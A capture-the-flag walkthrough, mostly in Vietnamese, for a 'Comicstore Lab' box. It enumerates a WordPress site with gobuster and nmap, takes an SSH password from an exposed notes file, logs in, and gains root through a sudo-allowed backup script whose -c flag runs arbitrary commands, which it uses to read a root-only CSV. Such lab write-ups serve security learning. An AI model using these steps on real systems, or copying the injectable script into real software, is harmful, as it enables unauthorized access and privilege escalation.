Comicstore Lab

The person who runs a comic store claims to have a rare collection, but engages in misleading behavior. He makes false promises to customers, such as exchanging comics or selling them for cash, which he never fulfills. This behavior raises concerns about the legitimacy of this rare comic book collection. Furthermore, his habit of regularly backing up MP3 files suggests a tech-savvy approach and possibly a sophisticated structure to his fraudulent activities. These allegations should be investigated to confirm the veracity of the rare comic book collection claims and to protect potential victim customers from this scam. Investigate and report back!

---

What could be a potential username?

• Truy cập vào trang web mục tiêu thì ta thấy ở phần contact có 1 email là johnny@comicstore.hv

==> The Answer : johnny

---

Looks like the admin has left a note for himself. What is the password?

• Dùng gobuster để quét thư mục:

                    __  __           __         _               
                   / / / /___ ______/ /___   __(_)_______  _____
                  / /_/ / __ `/ ___/ //_/ | / / / ___/ _ \/ ___/
                 / __  / /_/ / /__/ ,<  | |/ / (__  )  __/ /    
                /_/ /_/\__,_/\___/_/|_| |___/_/____/\___/_/     
                                                                

┌─[root@hackerbox]─[~]
└──╼ #gobuster dir -u http://comicstore.hv/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://comicstore.hv/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/_notes               (Status: 301) [Size: 315] [--> http://comicstore.hv/_notes/]
/0                    (Status: 200) [Size: 28710]
/admin                (Status: 302) [Size: 0] [--> http://comicstore.hv/wp-admin/]
/atom                 (Status: 200) [Size: 23215]
/dashboard            (Status: 302) [Size: 0] [--> http://comicstore.hv/wp-admin/]
/embed                (Status: 200) [Size: 28710]
/favicon.ico          (Status: 302) [Size: 0] [--> http://comicstore.hv/wp-includes/images/w-logo-blue-white-bg.png]
/feed                 (Status: 200) [Size: 21857]
/index.php            (Status: 200) [Size: 28710]
/javascript           (Status: 301) [Size: 319] [--> http://comicstore.hv/javascript/]
/login                (Status: 302) [Size: 0] [--> http://comicstore.hv/wp-login.php]
/page1                (Status: 200) [Size: 28710]
/rdf                  (Status: 200) [Size: 20776]
/robots.txt           (Status: 200) [Size: 67]
/rss                  (Status: 200) [Size: 4103]
/rss2                 (Status: 200) [Size: 21857]
/server-status        (Status: 403) [Size: 278]
/wp-admin             (Status: 301) [Size: 317] [--> http://comicstore.hv/wp-admin/]
/wp-content           (Status: 301) [Size: 319] [--> http://comicstore.hv/wp-content/]
/wp-includes          (Status: 301) [Size: 320] [--> http://comicstore.hv/wp-includes/]
/xmlrpc.php           (Status: 405) [Size: 42]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
┌─[root@hackerbox]─[~]
└──╼ #

• Dựa vào câu hỏi thì tôi đoán được đáp án sẽ nằm trong thu mục /_notes .
• Truy cập vào nó.

Index of /_notes
[ICO]	Name	Last modified	Size	Description
[PARENTDIR]	Parent Directory	 	- 	 
[TXT]	secret.txt	2024-03-03 04:05 	371 	 
[TXT]	securepasswords.txt	2024-03-06 12:05 	148 	 
[TXT]	shopping_list.txt	2024-03-03 04:04 	418 	 
[TXT]	todo.txt	2024-03-06 11:56 	151 	 
Apache/2.4.57 (Debian) Server at comicstore.hv Port 80

• Vào đọc file securepasswords.txt :

warthunder forum: 920312036099
my dota account: KR9ZT@Z
my ssh account: bl4z3
reddit alt-account: 2367ruest-emile
steam community: trustno11still07

==> The Answer : bl4z3

What is the name of the directory where comic books are kept?

• Dùng nmap quét mục tiêu :

                    __  __           __         _               
                   / / / /___ ______/ /___   __(_)_______  _____
                  / /_/ / __ `/ ___/ //_/ | / / / ___/ _ \/ ___/
                 / __  / /_/ / /__/ ,<  | |/ / (__  )  __/ /    
                /_/ /_/\__,_/\___/_/|_| |___/_/____/\___/_/     
                                                                

┌─[root@hackerbox]─[~]
└──╼ #nmap -sC -sV -p- comicstore.hv 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-14 05:57 CST
Nmap scan report for comicstore.hv (172.20.38.153)
Host is up (0.00026s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 f1:d3:3d:0e:44:58:c2:6e:7c:32:e2:9f:aa:d4:32:40 (ECDSA)
|_  256 10:6f:37:a1:79:c5:15:08:9c:23:44:ea:24:10:84:27 (ED25519)
80/tcp   open  http    Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Comic Store
|_http-generator: WordPress 6.5.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
3306/tcp open  mysql   MariaDB (unauthorized)
MAC Address: 52:54:00:15:5F:E4 (QEMU virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.39 seconds

• Trên mục tiêu có mở ssh , Tôi thử truy cập bằng tài khoản mật khẩu đã lấy được . Khi Tìm đến thư mục ~/Documents/ thì tìm thấy đáp án:

┌─[root@hackerbox]─[~]
└──╼ #ssh johnny@comicstore.hv 
The authenticity of host 'comicstore.hv (172.20.38.153)' can't be established.
ED25519 key fingerprint is SHA256:XUdI31RGtG8inWKt+WeBf6FOHNVHrCANnBe35cCyy4k.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'comicstore.hv' (ED25519) to the list of known hosts.
johnny@comicstore.hv's password: 
Linux comicstore 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
johnny@comicstore:~$ 
johnny@comicstore:~$ ls
Desktop  Documents  Music  Public  Videos
johnny@comicstore:~$ cd Documents/
johnny@comicstore:~/Documents$ ls
myc0ll3ct1on
johnny@comicstore:~/Documents$ 

==> The Answer : myc0ll3ct1on

---

What is the name of the script that is used for backing up mp3 files?

• Tôi tìm cách leo thang đặt quyền vì nghĩ là backup sẽ nằm trong /root :

johnny@comicstore:~$ getcap -r / 2>/dev/null
johnny@comicstore:~$ sudo -l
Matching Defaults entries for johnny on comicstore:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User johnny may run the following commands on comicstore:
    (root) NOPASSWD: /opt/.securebak/backup_mp3.sh
johnny@comicstore:~$ ^C
johnny@comicstore:~$ 

==> The Answer : backup_mp3.sh

---

What is the name of the richest person in the Scamlist.csv file?

• Tìm đến đọc file scamlist.csv nhưng chỉ có root mới xem được:

johnny@comicstore:~$ ls
Desktop  Documents  Music  Public  Videos
johnny@comicstore:~$ cd Documents/
johnny@comicstore:~/Documents$ ls
myc0ll3ct1on
johnny@comicstore:~/Documents$ cd myc0ll3ct1on/
johnny@comicstore:~/Documents/myc0ll3ct1on$ ls
notetomyself.txt  NotSoRare.cba  Rare.cba  scamlist.csv  SuperRare.cba	VeryRare.cba
johnny@comicstore:~/Documents/myc0ll3ct1on$ cat scamlist.csv 
cat: scamlist.csv: Permission denied
johnny@comicstore:~/Documents/myc0ll3ct1on$ 
johnny@comicstore:~/Documents/myc0ll3ct1on$ ls -la
total 49168
drwxr-xr-x 2 root   root       4096 May  2  2024 .
drwxr-xr-x 3 johnny johnny     4096 Feb 18  2024 ..
-rw-r--r-- 1 johnny johnny      226 Mar  3  2024 notetomyself.txt
-rw-r--r-- 1 johnny johnny 10485760 Feb 18  2024 NotSoRare.cba
-rw-r--r-- 1 johnny johnny 12582912 Feb 18  2024 Rare.cba
-rw------- 1 root   root        274 May  2  2024 scamlist.csv
-rw-r--r-- 1 johnny johnny 13631488 Feb 18  2024 SuperRare.cba
-rw-r--r-- 1 johnny johnny 13631488 Feb 18  2024 VeryRare.cba
johnny@comicstore:~/Documents/myc0ll3ct1on$ 

• Nhớ đến sudo -l , người dùng hiện tại là johnny có quyền sudo với file /opt/.securebak/backup_mp3.sh
• Mục tiêu để leo thang là đây :))).

johnny@comicstore:~$ getcap -r / 2>/dev/null
johnny@comicstore:~$ sudo -l
Matching Defaults entries for johnny on comicstore:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User johnny may run the following commands on comicstore:
    (root) NOPASSWD: /opt/.securebak/backup_mp3.sh

• Đọc nội dung của backup_mp3.sh :

ohnny@comicstore:/opt/.securebak$ cat backup_mp3.sh 
#!/bin/bash

sudo find / -name "*.mp3" | sudo tee -a /run/media/johnny/BACKUP/backedup.txt

# archive file to keep track of files
input="/run/media/johnny/BACKUP/backedup.txt"

while getopts c: flag; do
  case "${flag}" in
    c) command=${OPTARG};;
  esac
done

backup_files="/home/johnny/Music/song*.mp3"

# backup location
dest="/run/media/johnny/BACKUP"

# archive filename.
hostname=$(hostname -s)
archive_file="$hostname-bak.tar.gz"

# print starting message
echo "Backing up $backup_files to $dest/$archive_file" && echo

# backing up the files
tar czf $dest/$archive_file $backup_files

# print ending message
echo && echo "Backup finished"

cmd=$($command) && echo $cmd
johnny@comicstore:/opt/.securebak$ 

• Tôi hiểu sơ là nó sẽ dùng lệnh find để tìm kiếm file có đuôi .mp3 và sao lưu file đó vào file /run/media/johnny/BACKUP/backedup.txt . Và nó có opption -c để nhận lệnh command . Đây là mấu chốt để lên root (Tôi không tìm hiểu nhiều về scrip , Thắc mắc bạn có thể hỏi DeepSeek Ai hoặc các loại Ai khác ! ).

johnny@comicstore:~/Documents/myc0ll3ct1on$ pwd
/home/johnny/Documents/myc0ll3ct1on
johnny@comicstore:~/Documents/myc0ll3ct1on$ sudo -l
Matching Defaults entries for johnny on comicstore:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User johnny may run the following commands on comicstore:
    (root) NOPASSWD: /opt/.securebak/backup_mp3.sh
johnny@comicstore:~/Documents/myc0ll3ct1on$ sudo /opt/.securebak/backup_mp3.sh -c 'cat /home/johnny/Documents/myc0ll3ct1on/scamlist.csv'
tee: /run/media/johnny/BACKUP/backedup.txt: No such file or directory
Backing up /home/johnny/Music/song*.mp3 to /run/media/johnny/BACKUP/comicstore-bak.tar.gz

tar: Removing leading `/' from member names
tar: /home/johnny/Music/song*.mp3: Cannot stat: No such file or directory
tar (child): /run/media/johnny/BACKUP/comicstore-bak.tar.gz: Cannot open: No such file or directory
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now

Backup finished
Name,ComicIssue,Price,Notes Garey Elwyn,#144,500,A poor student that is hardly worth it. Rudy Darryl,#64,350,A total comic book nerd. Emily Randolf,#98,300,This woman is rolling in money Jones Nick,#32,500,Idk might get more. Charleen Kayla,#11,300,Buying for her bf. Raise
johnny@comicstore:~/Documents/myc0ll3ct1on$ 

==> The Answer : Emily Randolf